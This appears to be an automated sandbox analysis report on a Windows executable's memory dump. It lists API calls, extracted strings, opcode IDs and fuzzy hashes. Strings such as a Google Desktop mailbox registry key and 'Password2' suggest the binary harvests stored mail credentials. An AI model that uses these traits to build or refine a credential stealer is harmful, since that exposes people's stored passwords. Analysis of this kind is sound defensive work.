                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                • memset.MSVCRT ref: 00408258
                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                Strings
                                                                                                                                                                • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Close$EnumOpenmemset
                                                                                                                                                                • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                • API String ID: 2255314230-2212045309
                                                                                                                                                                • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                                                                • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                                                                • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                                                                • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                                                                  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FocusMessagePostmemset
                                                                                                                                                                • String ID: S_@$l
                                                                                                                                                                • API String ID: 3436799508-4018740455
                                                                                                                                                                • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                                • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                                • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                                • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _mbscpy
                                                                                                                                                                • String ID: C^@$X$ini
                                                                                                                                                                • API String ID: 714388716-917056472
                                                                                                                                                                • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                                • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                • String ID: MS Sans Serif
                                                                                                                                                                • API String ID: 3492281209-168460110
                                                                                                                                                                • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                                • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                                • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                                • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClassName_strcmpimemset
                                                                                                                                                                • String ID: edit
                                                                                                                                                                • API String ID: 275601554-2167791130
                                                                                                                                                                • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                                • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                                • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                                • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strlen$_mbscat
                                                                                                                                                                • String ID: 3CD
                                                                                                                                                                • API String ID: 3951308622-1938365332
                                                                                                                                                                • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                                • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _mbscat$_mbscpy
                                                                                                                                                                • String ID: Password2
                                                                                                                                                                • API String ID: 2600922555-1856559283
                                                                                                                                                                • Opcode ID: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                                                                                                                                                • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                                                                                                • Opcode Fuzzy Hash: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                                                                                                                                                • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76DC0A60,?,00000000), ref: 00410D1C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                • API String ID: 2574300362-543337301
                                                                                                                                                                • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                                                                                                                                • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset
                                                                                                                                                                • String ID: rows deleted
                                                                                                                                                                • API String ID: 2221118986-571615504
                                                                                                                                                                • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                                • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$memcmp
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3384217055-0
                                                                                                                                                                • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                                                                                                • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                                • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                                • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                                • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                                • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                                • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                                                                • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                                • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                                                • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset
                                                                                                                                                                • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                • API String ID: 2221118986-515162456
                                                                                                                                                                • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                                • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                • memset.MSVCRT ref: 004026AD
                                                                                                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                  • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1593657333-0
                                                                                                                                                                • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                                • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040C922
                                                                                                                                                                • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3798638045-0
                                                                                                                                                                • Opcode ID: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                                                                • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                                                                • Opcode Fuzzy Hash: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                                                                • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                                                                                                  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                                                                                                                                                                • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                • atoi.MSVCRT ref: 0040B619
                                                                                                                                                                • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4107816708-0
                                                                                                                                                                • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                                                                • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                                • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                                                                • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strlen
                                                                                                                                                                • String ID: >$>$>
                                                                                                                                                                • API String ID: 39653677-3911187716
                                                                                                                                                                • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                                                                • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                                • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                                                                • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                • String ID: @
                                                                                                                                                                • API String ID: 3510742995-2766056989
                                                                                                                                                                • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                                • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040799A
                                                                                                                                                                  • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                  • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
                                                                                                                                                                  • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004079BD
                                                                                                                                                                • memcpy.MSVCRT ref: 004079DD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1171893557-0
                                                                                                                                                                • Opcode ID: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                                                                                                • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                                                • Opcode Fuzzy Hash: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                                                                                                • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
